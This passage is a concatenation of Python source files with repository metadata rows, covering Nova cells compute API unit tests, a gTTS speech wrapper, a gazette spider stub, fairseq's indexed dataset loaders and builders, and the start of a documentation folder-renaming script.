actionerror = exception.ObjectActionError(action='destroy', reason='')
notfound = exception.InstanceNotFound(instance_id=instance.uuid)
@mock.patch.object(compute_api.API, 'delete')
@mock.patch.object(self.compute_api.cells_rpcapi,
'instance_delete_everywhere')
@mock.patch.object(compute_api.API, '_local_delete',
side_effect=actionerror)
@mock.patch.object(instance, 'refresh', side_effect=notfound)
@mock.patch.object(compute_api.API, '_lookup_instance',
return_value=(None, instance))
def _test(_mock_lookup_instance, mock_refresh, mock_local_delete,
mock_delete_everywhere, mock_compute_delete):
self.compute_api.delete(self.context, instance)
mock_delete_everywhere.assert_called_once_with(self.context,
instance, 'hard')
mock_local_delete.assert_called_once_with(self.context,
instance, mock.ANY, 'delete', self.compute_api._do_delete)
mock_refresh.assert_called_once_with()
self.assertFalse(mock_compute_delete.called)
_test()
def test_delete_instance_no_cell_instance_not_found_already_deleted(self):
# If anything in _local_delete accesses the instance causing a db
# lookup before instance.destroy() is reached, if the instance has
# already been deleted by a instance_destroy_at_top,
# InstanceNotFound will be raised
instance = objects.Instance(context=self.context,
uuid=uuids.delete_instance, cell_name=None,
host=None)
notfound = exception.InstanceNotFound(instance_id=instance.uuid)
@mock.patch.object(compute_api.API, 'delete')
@mock.patch.object(self.compute_api.cells_rpcapi,
'instance_delete_everywhere')
@mock.patch.object(compute_api.API, '_lookup_instance',
return_value=(None, instance))
@mock.patch.object(compute_api.API, '_local_delete',
side_effect=notfound)
def _test(mock_local_delete, _mock_lookup, mock_delete_everywhere,
mock_compute_delete):
self.compute_api.delete(self.context, instance)
mock_delete_everywhere.assert_called_once_with(self.context,
instance, 'hard')
mock_local_delete.assert_called_once_with(self.context,
instance, mock.ANY, 'delete', self.compute_api._do_delete)
self.assertFalse(mock_compute_delete.called)
_test()
def test_soft_delete_instance_no_cell(self):
self._test_delete_instance_no_cell('soft_delete')
def test_delete_instance_no_cell(self):
self._test_delete_instance_no_cell('delete')
def test_force_delete_instance_no_cell(self):
self._test_delete_instance_no_cell('force_delete')
@mock.patch.object(compute_api.API, '_delete_while_booting',
side_effect=exception.ObjectActionError(
action='delete', reason='host now set'))
@mock.patch.object(compute_api.API, '_local_delete')
@mock.patch.object(compute_api.API, '_lookup_instance')
@mock.patch.object(compute_api.API, 'delete')
def test_delete_instance_no_cell_then_cell(self, mock_delete,
mock_lookup_instance,
mock_local_delete,
mock_delete_while_booting):
# This checks the case where initially an instance has no cell_name,
# and therefore no host, set but instance.destroy fails because
# there is now a host.
instance = self._create_fake_instance_obj()
instance_with_cell = copy.deepcopy(instance)
instance_with_cell.cell_name = 'foo'
mock_lookup_instance.return_value = None, instance_with_cell
cells_rpcapi = self.compute_api.cells_rpcapi
@mock.patch.object(cells_rpcapi, 'instance_delete_everywhere')
def test(mock_inst_delete_everywhere):
self.compute_api.delete(self.context, instance)
mock_local_delete.assert_not_called()
mock_delete.assert_called_once_with(self.context,
instance_with_cell)
test()
@mock.patch.object(compute_api.API, '_delete_while_booting',
side_effect=exception.ObjectActionError(
action='delete', reason='host now set'))
@mock.patch.object(compute_api.API, '_local_delete')
@mock.patch.object(compute_api.API, '_lookup_instance')
@mock.patch.object(compute_api.API, 'delete')
def test_delete_instance_no_cell_then_no_instance(self,
mock_delete, mock_lookup_instance, mock_local_delete,
mock_delete_while_booting):
# This checks the case where initially an instance has no cell_name,
# and therefore no host, set but instance.destroy fails because
# there is now a host. And then the instance can't be looked up.
instance = self._create_fake_instance_obj()
mock_lookup_instance.return_value = None, None
cells_rpcapi = self.compute_api.cells_rpcapi
@mock.patch.object(cells_rpcapi, 'instance_delete_everywhere')
def test(mock_inst_delete_everywhere):
self.compute_api.delete(self.context, instance)
mock_local_delete.assert_not_called()
mock_delete.assert_not_called()
test()
def test_get_migrations(self):
filters = {'cell_name': 'ChildCell', 'status': 'confirmed'}
migrations = {'migrations': [{'id': 1234}]}
@mock.patch.object(self.compute_api.cells_rpcapi, 'get_migrations',
return_value=migrations)
def test(mock_cell_get_migrations):
response = self.compute_api.get_migrations(self.context,
filters)
mock_cell_get_migrations.assert_called_once_with(self.context,
filters)
self.assertEqual(migrations, response)
test()
def test_create_block_device_mapping(self):
instance_type = {'swap': 1, 'ephemeral_gb': 1}
instance = self._create_fake_instance_obj()
bdms = [block_device.BlockDeviceDict({'source_type': 'image',
'destination_type': 'local',
'image_id': uuids.image,
'boot_index': 0})]
self.compute_api._create_block_device_mapping(
instance_type, instance.uuid, bdms)
bdms = db.block_device_mapping_get_all_by_instance(
self.context, instance['uuid'])
self.assertEqual(0, len(bdms))
def test_create_bdm_from_flavor(self):
self.skipTest("Test is incompatible with cells.")
@mock.patch('nova.cells.messaging._TargetedMessage')
def test_rebuild_sig(self, mock_msg):
# TODO(belliott) Cells could benefit from better testing to ensure API
# and manager signatures stay up to date
def wire(version):
# wire the rpc cast directly to the manager method to make sure
# the signature matches
cells_mgr = manager.CellsManager()
def cast(context, method, *args, **kwargs):
fn = getattr(cells_mgr, method)
fn(context, *args, **kwargs)
cells_mgr.cast = cast
return cells_mgr
cells_rpcapi = self.compute_api.cells_rpcapi
client = cells_rpcapi.client
with mock.patch.object(client, 'prepare', side_effect=wire):
inst = self._create_fake_instance_obj()
inst.cell_name = 'mycell'
cells_rpcapi.rebuild_instance(self.context, inst, 'pass', None,
None, None, None, None,
recreate=False,
on_shared_storage=False, host='host',
preserve_ephemeral=True, kwargs=None)
# one targeted message should have been created
self.assertEqual(1, mock_msg.call_count)
def test_populate_instance_for_create(self):
super(CellsComputeAPITestCase, self).test_populate_instance_for_create(
num_instances=2)
def test_multi_instance_display_name(self):
super(CellsComputeAPITestCase,
self).test_multi_instance_display_name(cells_enabled=True)
@ddt.data(True, False)
def test_rdp_console(self, enabled_consoleauth):
self.skipTest("Removing cells v1")
@ddt.data(True, False)
def test_spice_console(self, enabled_consoleauth):
self.skipTest("Removing cells v1")
@ddt.data(True, False)
def test_vnc_console(self, enabled_consoleauth):
self.skipTest("Removing cells v1")
class CellsShelveComputeAPITestCase(test_shelve.ShelveComputeAPITestCase):
def setUp(self):
super(CellsShelveComputeAPITestCase, self).setUp()
global ORIG_COMPUTE_API
ORIG_COMPUTE_API = self.compute_api
self.compute_api = compute_cells_api.ComputeCellsAPI()
def _fake_validate_cell(*args, **kwargs):
return
self.stub_out('nova.compute.api.API._validate_cell',
_fake_validate_cell)
def _create_fake_instance_obj(self, params=None, type_name='m1.tiny',
services=False, context=None):
flavor = flavors.get_flavor_by_name(type_name)
inst = objects.Instance(context=context or self.context)
inst.cell_name = 'api!child'
inst.vm_state = vm_states.ACTIVE
inst.task_state = None
inst.power_state = power_state.RUNNING
inst.image_ref = FAKE_IMAGE_REF
inst.reservation_id = 'r-fakeres'
inst.user_id = self.user_id
inst.project_id = self.project_id
inst.host = self.compute.host
inst.node = NODENAME
inst.instance_type_id = flavor.id
inst.ami_launch_index = 0
inst.memory_mb = 0
inst.vcpus = 0
inst.root_gb = 0
inst.ephemeral_gb = 0
inst.architecture = obj_fields.Architecture.X86_64
inst.os_type = 'Linux'
inst.system_metadata = (
params and params.get('system_metadata', {}) or {})
inst.locked = False
inst.created_at = timeutils.utcnow()
inst.updated_at = timeutils.utcnow()
inst.launched_at = timeutils.utcnow()
inst.security_groups = objects.SecurityGroupList(objects=[])
inst.flavor = flavor
inst.old_flavor = None
inst.new_flavor = None
if params:
inst.flavor.update(params.pop('flavor', {}))
inst.update(params)
inst.create()
return inst
def _test_shelve(self, vm_state=vm_states.ACTIVE,
boot_from_volume=False, clean_shutdown=True):
params = dict(task_state=None, vm_state=vm_state,
display_name='fake-name')
instance = self._create_fake_instance_obj(params=params)
with mock.patch.object(self.compute_api,
'_cast_to_cells') as cast_to_cells:
self.compute_api.shelve(self.context, instance,
clean_shutdown=clean_shutdown)
cast_to_cells.assert_called_once_with(self.context,
instance, 'shelve',
clean_shutdown=clean_shutdown
)
def test_unshelve(self):
# Ensure instance can be unshelved on cell environment.
# The super class tests nova-shelve.
instance = self._create_fake_instance_obj()
self.assertIsNone(instance['task_state'])
self.compute_api.shelve(self.context, instance)
instance.task_state = None
instance.vm_state = vm_states.SHELVED
instance.save()
with mock.patch.object(self.compute_api,
'_cast_to_cells') as cast_to_cells:
self.compute_api.unshelve(self.context, instance)
cast_to_cells.assert_called_once_with(self.context,
instance, 'unshelve')
def tearDown(self):
global ORIG_COMPUTE_API
self.compute_api = ORIG_COMPUTE_API
super(CellsShelveComputeAPITestCase, self).tearDown()
class CellsConductorAPIRPCRedirect(test.NoDBTestCase):
def setUp(self):
super(CellsConductorAPIRPCRedirect, self).setUp()
self.compute_api = compute_cells_api.ComputeCellsAPI()
self.cells_rpcapi = mock.MagicMock()
self.compute_api.compute_task_api.cells_rpcapi = self.cells_rpcapi
self.context = context.RequestContext('fake', 'fake')
@mock.patch.object(compute_api.API, '_record_action_start')
@mock.patch.object(compute_api.API, '_provision_instances')
@mock.patch.object(compute_api.API, '_check_and_transform_bdm')
@mock.patch.object(compute_api.API, '_get_image')
@mock.patch.object(compute_api.API, '_validate_and_build_base_options')
@mock.patch.object(compute_api.API, '_checks_for_create_and_rebuild')
def test_build_instances(self, _checks_for_create_and_rebuild,
_validate, _get_image, _check_bdm,
_provision, _record_action_start):
_get_image.return_value = (None, 'fake-image')
_validate.return_value = ({}, 1, None, ['default'], None)
_check_bdm.return_value = objects.BlockDeviceMappingList()
_provision.return_value = []
with mock.patch.object(self.compute_api.compute_task_api,
'schedule_and_build_instances') as sbi:
self.compute_api.create(self.context, 'fake-flavor', 'fake-image')
# Subsequent tests in class are verifying the hooking. We
# don't check args since this is verified in compute test
# code.
self.assertTrue(sbi.called)
@mock.patch.object(compute_api.API, '_validate_flavor_image_nostatus')
@mock.patch.object(objects.RequestSpec, 'get_by_instance_uuid')
@mock.patch.object(compute_api.API, '_record_action_start')
@mock.patch.object(compute_api.API, '_resize_cells_support')
@mock.patch.object(compute_utils, 'upsize_quota_delta')
@mock.patch.object(objects.Instance, 'save')
@mock.patch.object(flavors, 'extract_flavor')
@mock.patch.object(compute_api.API, '_check_auto_disk_config')
@mock.patch.object(objects.BlockDeviceMappingList, 'get_by_instance_uuid')
def test_resize_instance(self, _bdms, _check, _extract, _save, _upsize,
_cells, _record, _spec_get_by_uuid,
mock_validate):
flavor = objects.Flavor(**test_flavor.fake_flavor)
_extract.return_value = flavor
orig_system_metadata = {}
instance = fake_instance.fake_instance_obj(self.context,
vm_state=vm_states.ACTIVE, cell_name='fake-cell',
launched_at=timeutils.utcnow(),
system_metadata=orig_system_metadata,
expected_attrs=['system_metadata'])
instance.flavor = flavor
instance.old_flavor = instance.new_flavor = None
self.compute_api.resize(self.context, instance)
self.assertTrue(self.cells_rpcapi.resize_instance.called)
@mock.patch.object(objects.ComputeNodeList, 'get_all_by_host')
@mock.patch.object(objects.RequestSpec, 'get_by_instance_uuid')
@mock.patch.object(compute_api.API, '_record_action_start')
@mock.patch.object(objects.Instance, 'save')
def test_live_migrate_instance(self, instance_save, _record, _get_spec,
mock_nodelist):
orig_system_metadata = {}
instance = fake_instance.fake_instance_obj(self.context,
vm_state=vm_states.ACTIVE, cell_name='fake-cell',
launched_at=timeutils.utcnow(),
system_metadata=orig_system_metadata,
expected_attrs=['system_metadata'])
self.compute_api.live_migrate(self.context, instance,
True, True, 'fake_dest_host')
self.assertTrue(self.cells_rpcapi.live_migrate_instance.called)
@mock.patch.object(objects.RequestSpec, 'get_by_instance_uuid')
@mock.patch.object(objects.Instance, 'save')
@mock.patch.object(objects.Instance, 'get_flavor')
@mock.patch.object(objects.BlockDeviceMappingList, 'get_by_instance_uuid')
@mock.patch.object(compute_api.API, '_get_image')
@mock.patch.object(compute_api.API, '_check_auto_disk_config')
@mock.patch.object(compute_api.API, '_checks_for_create_and_rebuild')
@mock.patch.object(compute_api.API, '_record_action_start')
def test_rebuild_instance(self, _record_action_start,
_checks_for_create_and_rebuild, _check_auto_disk_config,
_get_image, bdm_get_by_instance_uuid, get_flavor, instance_save,
_req_spec_get_by_inst_uuid):
orig_system_metadata = {}
instance = fake_instance.fake_instance_obj(self.context,
vm_state=vm_states.ACTIVE, cell_name='fake-cell',
launched_at=timeutils.utcnow(), image_ref=uuids.image_id,
system_metadata=orig_system_metadata,
expected_attrs=['system_metadata'])
get_flavor.return_value = {}
# The API request schema validates that a UUID is passed for the
# imageRef parameter so we need to provide an image.
image_href = uuids.image_id
image = {"min_ram": 10, "min_disk": 1,
"properties": {'architecture': 'x86_64'},
"id": uuids.image_id}
admin_pass = ''
files_to_inject = []
bdms = objects.BlockDeviceMappingList()
_get_image.return_value = (None, image)
bdm_get_by_instance_uuid.return_value = bdms
self.compute_api.rebuild(self.context, instance, image_href,
admin_pass, files_to_inject)
self.assertTrue(self.cells_rpcapi.rebuild_instance.called)
def test_check_equal(self):
task_api = self.compute_api.compute_task_api
tests = set()
for (name, value) in inspect.getmembers(self, inspect.ismethod):
if name.startswith('test_') and name != 'test_check_equal':
tests.add(name[5:])
if tests != set(task_api.cells_compatible):
self.fail("Testcases not equivalent to cells_compatible list")
| 44.046667 | 79 | 0.639534 |
1317f7e7b8f7b446f660a02247a2b29b878c80dc | 54 | py | Python | smsauth3/__init__.py | kwugfighter/sms-auth | 183d3f279fd94e69b0c486612853cd5f4621bf9d | [
"MIT"
] | null | null | null | smsauth3/__init__.py | kwugfighter/sms-auth | 183d3f279fd94e69b0c486612853cd5f4621bf9d | [
"MIT"
] | null | null | null | smsauth3/__init__.py | kwugfighter/sms-auth | 183d3f279fd94e69b0c486612853cd5f4621bf9d | [
"MIT"
] | null | null | null | from .main import SMSAuthorizer
__version__ = "0.1.2" | 18 | 31 | 0.759259 |
4f933f664fef5ed60828fd3ae9f6d33675db8532 | 449 | py | Python | gTTSwrapper.py | mytja/gTTS-wrapper | ed6452e1e870d913479252030ca343aa2a7742ca | [
"MIT"
] | 1 | 2020-08-26T17:08:30.000Z | 2020-08-26T17:08:30.000Z | gTTSwrapper.py | mytja/gTTS-wrapper | ed6452e1e870d913479252030ca343aa2a7742ca | [
"MIT"
] | null | null | null | gTTSwrapper.py | mytja/gTTS-wrapper | ed6452e1e870d913479252030ca343aa2a7742ca | [
"MIT"
] | null | null | null | # gTTS wrapper
import io
import pygame
from gtts import gTTS
# To play audio text-to-speech during execution
def say(my_text, language="en", slo=False):
with io.BytesIO() as f:
gTTS(text=my_text, lang=language, slow=slo).write_to_fp(f)
f.seek(0)
pygame.mixer.init()
pygame.mixer.music.load(f)
pygame.mixer.music.play()
while pygame.mixer.music.get_busy():
continue
| 24.944444 | 67 | 0.621381 |
4c92ce244030df317c3a30e338dd9e45f85fd368 | 192 | py | Python | data_collection/gazette/spiders/sc_chapeco.py | kaiocp/querido-diario | 86004049c6eee305e13066cf3607d30849bb099a | [
"MIT"
] | 454 | 2018-04-07T03:32:57.000Z | 2020-08-17T19:56:22.000Z | data_collection/gazette/spiders/sc_chapeco.py | kaiocp/querido-diario | 86004049c6eee305e13066cf3607d30849bb099a | [
"MIT"
] | 254 | 2020-08-18T14:09:43.000Z | 2022-03-28T11:30:51.000Z | data_collection/gazette/spiders/sc_chapeco.py | kaiocp/querido-diario | 86004049c6eee305e13066cf3607d30849bb099a | [
"MIT"
] | 183 | 2018-04-11T15:09:37.000Z | 2020-08-15T18:55:11.000Z | from gazette.spiders.base.fecam import FecamGazetteSpider
class ScChapecoSpider(FecamGazetteSpider):
name = "sc_chapeco"
FECAM_QUERY = "cod_entidade:71"
TERRITORY_ID = "4204202"
| 24 | 57 | 0.765625 |
3efecab3a6eb6928d1eb2053c2a9118989b01b38 | 17,195 | py | Python | fairseq/data/indexed_dataset.py | Epsilon-Lee/fairseq-da | fbe7a39717afcb60dd4a3e1cd6abd3c763354fe1 | [
"MIT"
] | 35 | 2021-05-08T09:23:31.000Z | 2022-03-25T06:19:48.000Z | fairseq/data/indexed_dataset.py | Epsilon-Lee/fairseq-da | fbe7a39717afcb60dd4a3e1cd6abd3c763354fe1 | [
"MIT"
] | 4 | 2021-06-12T05:02:03.000Z | 2021-12-19T08:53:46.000Z | fairseq/data/indexed_dataset.py | Epsilon-Lee/fairseq-da | fbe7a39717afcb60dd4a3e1cd6abd3c763354fe1 | [
"MIT"
] | 4 | 2021-06-02T16:12:02.000Z | 2022-02-28T12:18:24.000Z | # Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import os
import shutil
import struct
from functools import lru_cache
import numpy as np
import torch
from fairseq.data.fasta_dataset import FastaDataset
from fairseq.file_io import PathManager
from . import FairseqDataset
def __best_fitting_dtype(vocab_size=None):
if vocab_size is not None and vocab_size < 65500:
return np.uint16
else:
return np.int32
def get_available_dataset_impl():
return ["raw", "lazy", "cached", "mmap", "fasta"]
def infer_dataset_impl(path):
if IndexedRawTextDataset.exists(path):
return "raw"
elif IndexedDataset.exists(path):
with open(index_file_path(path), "rb") as f:
magic = f.read(8)
if magic == IndexedDataset._HDR_MAGIC:
return "cached"
elif magic == MMapIndexedDataset.Index._HDR_MAGIC[:8]:
return "mmap"
else:
return None
elif FastaDataset.exists(path):
return "fasta"
else:
return None
def make_builder(out_file, impl, vocab_size=None):
if impl == "mmap":
return MMapIndexedDatasetBuilder(
out_file, dtype=__best_fitting_dtype(vocab_size)
)
elif impl == "fasta":
raise NotImplementedError
else:
return IndexedDatasetBuilder(out_file)
def make_dataset(path, impl, fix_lua_indexing=False, dictionary=None):
if impl == "raw" and IndexedRawTextDataset.exists(path):
assert dictionary is not None
return IndexedRawTextDataset(path, dictionary)
elif impl == "lazy" and IndexedDataset.exists(path):
return IndexedDataset(path, fix_lua_indexing=fix_lua_indexing)
elif impl == "cached" and IndexedDataset.exists(path):
return IndexedCachedDataset(path, fix_lua_indexing=fix_lua_indexing)
elif impl == "mmap" and MMapIndexedDataset.exists(path):
return MMapIndexedDataset(path)
elif impl == "fasta" and FastaDataset.exists(path):
from fairseq.data.fasta_dataset import EncodedFastaDataset
return EncodedFastaDataset(path, dictionary)
return None
def dataset_exists(path, impl):
if impl == "raw":
return IndexedRawTextDataset.exists(path)
elif impl == "mmap":
return MMapIndexedDataset.exists(path)
else:
return IndexedDataset.exists(path)
def read_longs(f, n):
a = np.empty(n, dtype=np.int64)
f.readinto(a)
return a
def write_longs(f, a):
f.write(np.array(a, dtype=np.int64))
dtypes = {
1: np.uint8,
2: np.int8,
3: np.int16,
4: np.int32,
5: np.int64,
6: np.float,
7: np.double,
8: np.uint16,
}
def code(dtype):
for k in dtypes.keys():
if dtypes[k] == dtype:
return k
raise ValueError(dtype)
def index_file_path(prefix_path):
return prefix_path + ".idx"
def data_file_path(prefix_path):
return prefix_path + ".bin"
class IndexedDataset(FairseqDataset):
"""Loader for TorchNet IndexedDataset"""
_HDR_MAGIC = b"TNTIDX\x00\x00"
def __init__(self, path, fix_lua_indexing=False):
super().__init__()
self.path = path
self.fix_lua_indexing = fix_lua_indexing
self.data_file = None
self.read_index(path)
def read_index(self, path):
with open(index_file_path(path), "rb") as f:
magic = f.read(8)
assert magic == self._HDR_MAGIC, (
"Index file doesn't match expected format. "
"Make sure that --dataset-impl is configured properly."
)
version = f.read(8)
assert struct.unpack("<Q", version) == (1,)
code, self.element_size = struct.unpack("<QQ", f.read(16))
self.dtype = dtypes[code]
self._len, self.s = struct.unpack("<QQ", f.read(16))
self.dim_offsets = read_longs(f, self._len + 1)
self.data_offsets = read_longs(f, self._len + 1)
self.sizes = read_longs(f, self.s)
def read_data(self, path):
self.data_file = open(data_file_path(path), "rb", buffering=0)
def check_index(self, i):
if i < 0 or i >= self._len:
raise IndexError("index out of range")
def __del__(self):
if self.data_file:
self.data_file.close()
@lru_cache(maxsize=8)
def __getitem__(self, i):
if not self.data_file:
self.read_data(self.path)
self.check_index(i)
tensor_size = self.sizes[self.dim_offsets[i] : self.dim_offsets[i + 1]]
a = np.empty(tensor_size, dtype=self.dtype)
self.data_file.seek(self.data_offsets[i] * self.element_size)
self.data_file.readinto(a)
item = torch.from_numpy(a).long()
if self.fix_lua_indexing:
item -= 1 # subtract 1 for 0-based indexing
return item
def __len__(self):
return self._len
def num_tokens(self, index):
return self.sizes[index]
def size(self, index):
return self.sizes[index]
@staticmethod
def exists(path):
return PathManager.exists(index_file_path(path)) and PathManager.exists(
data_file_path(path)
)
@property
def supports_prefetch(self):
return False # avoid prefetching to save memory
class IndexedCachedDataset(IndexedDataset):
def __init__(self, path, fix_lua_indexing=False):
super().__init__(path, fix_lua_indexing=fix_lua_indexing)
self.cache = None
self.cache_index = {}
@property
def supports_prefetch(self):
return True
def prefetch(self, indices):
if all(i in self.cache_index for i in indices):
return
if not self.data_file:
self.read_data(self.path)
indices = sorted(set(indices))
total_size = 0
for i in indices:
total_size += self.data_offsets[i + 1] - self.data_offsets[i]
self.cache = np.empty(total_size, dtype=self.dtype)
ptx = 0
self.cache_index.clear()
for i in indices:
self.cache_index[i] = ptx
size = self.data_offsets[i + 1] - self.data_offsets[i]
a = self.cache[ptx : ptx + size]
self.data_file.seek(self.data_offsets[i] * self.element_size)
self.data_file.readinto(a)
ptx += size
if self.data_file:
# close and delete data file after prefetch so we can pickle
self.data_file.close()
self.data_file = None
@lru_cache(maxsize=8)
def __getitem__(self, i):
self.check_index(i)
tensor_size = self.sizes[self.dim_offsets[i] : self.dim_offsets[i + 1]]
a = np.empty(tensor_size, dtype=self.dtype)
ptx = self.cache_index[i]
np.copyto(a, self.cache[ptx : ptx + a.size])
item = torch.from_numpy(a).long()
if self.fix_lua_indexing:
item -= 1 # subtract 1 for 0-based indexing
return item
class IndexedRawTextDataset(FairseqDataset):
"""Takes a text file as input and binarizes it in memory at instantiation.
Original lines are also kept in memory"""
def __init__(self, path, dictionary, append_eos=True, reverse_order=False):
self.tokens_list = []
self.lines = []
self.sizes = []
self.append_eos = append_eos
self.reverse_order = reverse_order
self.read_data(path, dictionary)
self.size = len(self.tokens_list)
def read_data(self, path, dictionary):
with open(path, "r", encoding="utf-8") as f:
for line in f:
self.lines.append(line.strip("\n"))
tokens = dictionary.encode_line(
line,
add_if_not_exist=False,
append_eos=self.append_eos,
reverse_order=self.reverse_order,
).long()
self.tokens_list.append(tokens)
self.sizes.append(len(tokens))
self.sizes = np.array(self.sizes)
def check_index(self, i):
if i < 0 or i >= self.size:
raise IndexError("index out of range")
@lru_cache(maxsize=8)
def __getitem__(self, i):
self.check_index(i)
return self.tokens_list[i]
def get_original_text(self, i):
self.check_index(i)
return self.lines[i]
def __del__(self):
pass
def __len__(self):
return self.size
def num_tokens(self, index):
return self.sizes[index]
def size(self, index):
return self.sizes[index]
@staticmethod
def exists(path):
return PathManager.exists(path)
class IndexedDatasetBuilder(object):
element_sizes = {
np.uint8: 1,
np.int8: 1,
np.int16: 2,
np.int32: 4,
np.int64: 8,
np.float: 4,
np.double: 8,
}
def __init__(self, out_file, dtype=np.int32):
self.out_file = open(out_file, "wb")
self.dtype = dtype
self.data_offsets = [0]
self.dim_offsets = [0]
self.sizes = []
self.element_size = self.element_sizes[self.dtype]
def add_item(self, tensor):
# +1 for Lua compatibility
bytes = self.out_file.write(np.array(tensor.numpy() + 1, dtype=self.dtype))
self.data_offsets.append(self.data_offsets[-1] + bytes / self.element_size)
for s in tensor.size():
self.sizes.append(s)
self.dim_offsets.append(self.dim_offsets[-1] + len(tensor.size()))
def merge_file_(self, another_file):
index = IndexedDataset(another_file)
assert index.dtype == self.dtype
begin = self.data_offsets[-1]
for offset in index.data_offsets[1:]:
self.data_offsets.append(begin + offset)
self.sizes.extend(index.sizes)
begin = self.dim_offsets[-1]
for dim_offset in index.dim_offsets[1:]:
self.dim_offsets.append(begin + dim_offset)
with open(data_file_path(another_file), "rb") as f:
while True:
data = f.read(1024)
if data:
self.out_file.write(data)
else:
break
def finalize(self, index_file):
self.out_file.close()
index = open(index_file, "wb")
index.write(b"TNTIDX\x00\x00")
index.write(struct.pack("<Q", 1))
index.write(struct.pack("<QQ", code(self.dtype), self.element_size))
index.write(struct.pack("<QQ", len(self.data_offsets) - 1, len(self.sizes)))
write_longs(index, self.dim_offsets)
write_longs(index, self.data_offsets)
write_longs(index, self.sizes)
index.close()
def _warmup_mmap_file(path):
with open(path, "rb") as stream:
while stream.read(100 * 1024 * 1024):
pass
class MMapIndexedDataset(torch.utils.data.Dataset):
class Index(object):
_HDR_MAGIC = b"MMIDIDX\x00\x00"
@classmethod
def writer(cls, path, dtype):
class _Writer(object):
def __enter__(self):
self._file = open(path, "wb")
self._file.write(cls._HDR_MAGIC)
self._file.write(struct.pack("<Q", 1))
self._file.write(struct.pack("<B", code(dtype)))
return self
@staticmethod
def _get_pointers(sizes):
dtype_size = dtype().itemsize
address = 0
pointers = []
for size in sizes:
pointers.append(address)
address += size * dtype_size
return pointers
def write(self, sizes):
pointers = self._get_pointers(sizes)
self._file.write(struct.pack("<Q", len(sizes)))
sizes = np.array(sizes, dtype=np.int32)
self._file.write(sizes.tobytes(order="C"))
del sizes
pointers = np.array(pointers, dtype=np.int64)
self._file.write(pointers.tobytes(order="C"))
del pointers
def __exit__(self, exc_type, exc_val, exc_tb):
self._file.close()
return _Writer()
def __init__(self, path):
with open(path, "rb") as stream:
magic_test = stream.read(9)
assert self._HDR_MAGIC == magic_test, (
"Index file doesn't match expected format. "
"Make sure that --dataset-impl is configured properly."
)
version = struct.unpack("<Q", stream.read(8))
assert (1,) == version
(dtype_code,) = struct.unpack("<B", stream.read(1))
self._dtype = dtypes[dtype_code]
self._dtype_size = self._dtype().itemsize
self._len = struct.unpack("<Q", stream.read(8))[0]
offset = stream.tell()
_warmup_mmap_file(path)
self._bin_buffer_mmap = np.memmap(path, mode="r", order="C")
self._bin_buffer = memoryview(self._bin_buffer_mmap)
self._sizes = np.frombuffer(
self._bin_buffer, dtype=np.int32, count=self._len, offset=offset
)
self._pointers = np.frombuffer(
self._bin_buffer,
dtype=np.int64,
count=self._len,
offset=offset + self._sizes.nbytes,
)
def __del__(self):
self._bin_buffer_mmap._mmap.close()
del self._bin_buffer_mmap
@property
def dtype(self):
return self._dtype
@property
def sizes(self):
return self._sizes
@lru_cache(maxsize=8)
def __getitem__(self, i):
return self._pointers[i], self._sizes[i]
def __len__(self):
return self._len
def __init__(self, path):
super().__init__()
self._path = None
self._index = None
self._bin_buffer = None
self._do_init(path)
def __getstate__(self):
return self._path
def __setstate__(self, state):
self._do_init(state)
def _do_init(self, path):
self._path = path
self._index = self.Index(index_file_path(self._path))
_warmup_mmap_file(data_file_path(self._path))
self._bin_buffer_mmap = np.memmap(
data_file_path(self._path), mode="r", order="C"
)
self._bin_buffer = memoryview(self._bin_buffer_mmap)
def __del__(self):
self._bin_buffer_mmap._mmap.close()
del self._bin_buffer_mmap
del self._index
def __len__(self):
return len(self._index)
@lru_cache(maxsize=8)
def __getitem__(self, i):
ptr, size = self._index[i]
np_array = np.frombuffer(
self._bin_buffer, dtype=self._index.dtype, count=size, offset=ptr
)
if self._index.dtype != np.int64:
np_array = np_array.astype(np.int64)
return torch.from_numpy(np_array)
@property
def sizes(self):
return self._index.sizes
@property
def supports_prefetch(self):
return False
@staticmethod
def exists(path):
return PathManager.exists(index_file_path(path)) and PathManager.exists(
data_file_path(path)
)
def get_indexed_dataset_to_local(path):
local_index_path = PathManager.get_local_path(index_file_path(path))
local_data_path = PathManager.get_local_path(data_file_path(path))
assert local_index_path.endswith(".idx") and local_data_path.endswith(".bin"), (
"PathManager.get_local_path does not return files with expected patterns: "
f"{local_index_path} and {local_data_path}"
)
local_path = local_data_path[:-4] # stripping surfix ".bin"
assert local_path == local_index_path[:-4] # stripping surfix ".idx"
return local_path
class MMapIndexedDatasetBuilder(object):
def __init__(self, out_file, dtype=np.int64):
self._data_file = open(out_file, "wb")
self._dtype = dtype
self._sizes = []
def add_item(self, tensor):
np_array = np.array(tensor.numpy(), dtype=self._dtype)
self._data_file.write(np_array.tobytes(order="C"))
self._sizes.append(np_array.size)
def merge_file_(self, another_file):
# Concatenate index
index = MMapIndexedDataset.Index(index_file_path(another_file))
assert index.dtype == self._dtype
for size in index.sizes:
self._sizes.append(size)
# Concatenate data
with open(data_file_path(another_file), "rb") as f:
shutil.copyfileobj(f, self._data_file)
def finalize(self, index_file):
self._data_file.close()
with MMapIndexedDataset.Index.writer(index_file, self._dtype) as index:
index.write(self._sizes)
| 30.596085 | 84 | 0.594999 |
d65b8a350eed18deb03b4da4a00e2ca7b9c3efb8 | 2,700 | py | Python | tools/doc/rename_folders.py | mszhanyi/onnxruntime | 6f85d3e5c81c919022ac4a77e5a051da8518b15d | [
"MIT"
] | 669 | 2018-12-03T22:00:31.000Z | 2019-05-06T19:42:49.000Z | tools/doc/rename_folders.py | mszhanyi/onnxruntime | 6f85d3e5c81c919022ac4a77e5a051da8518b15d | [
"MIT"
] | 440 | 2018-12-03T21:09:56.000Z | 2019-05-06T20:47:23.000Z | tools/doc/rename_folders.py | mszhanyi/onnxruntime | 6f85d3e5c81c919022ac4a77e5a051da8518b15d | [
"MIT"
] | 140 | 2018-12-03T21:15:28.000Z | 2019-05-06T18:02:36.000Z | """
Github publishes the markdown documentation with jekyll enabled.
This extension does not publish any folder starting with `_`.
These folders need to be renamed.
"""
import os
import re
def rename_folder(root):
"""
Renames all folder starting with `_`.
Returns the list of renamed folders.
"""
found = []
for r, dirs, files in os.walk(root):
for name in dirs:
if name.startswith("_"):
found.append((r, name))
renamed = []
for r, name in found:
into = name.lstrip("_")
renamed.append((r, name, into))
full_src = os.path.join(r, name)
full_into = os.path.join(r, into)
if os.path.exists(full_into):
raise RuntimeError("%r already exists, previous documentation should be removed.")
print("rename %r" % full_src)
os.rename(full_src, full_into)
return renamed
def replace_files(root, renamed):
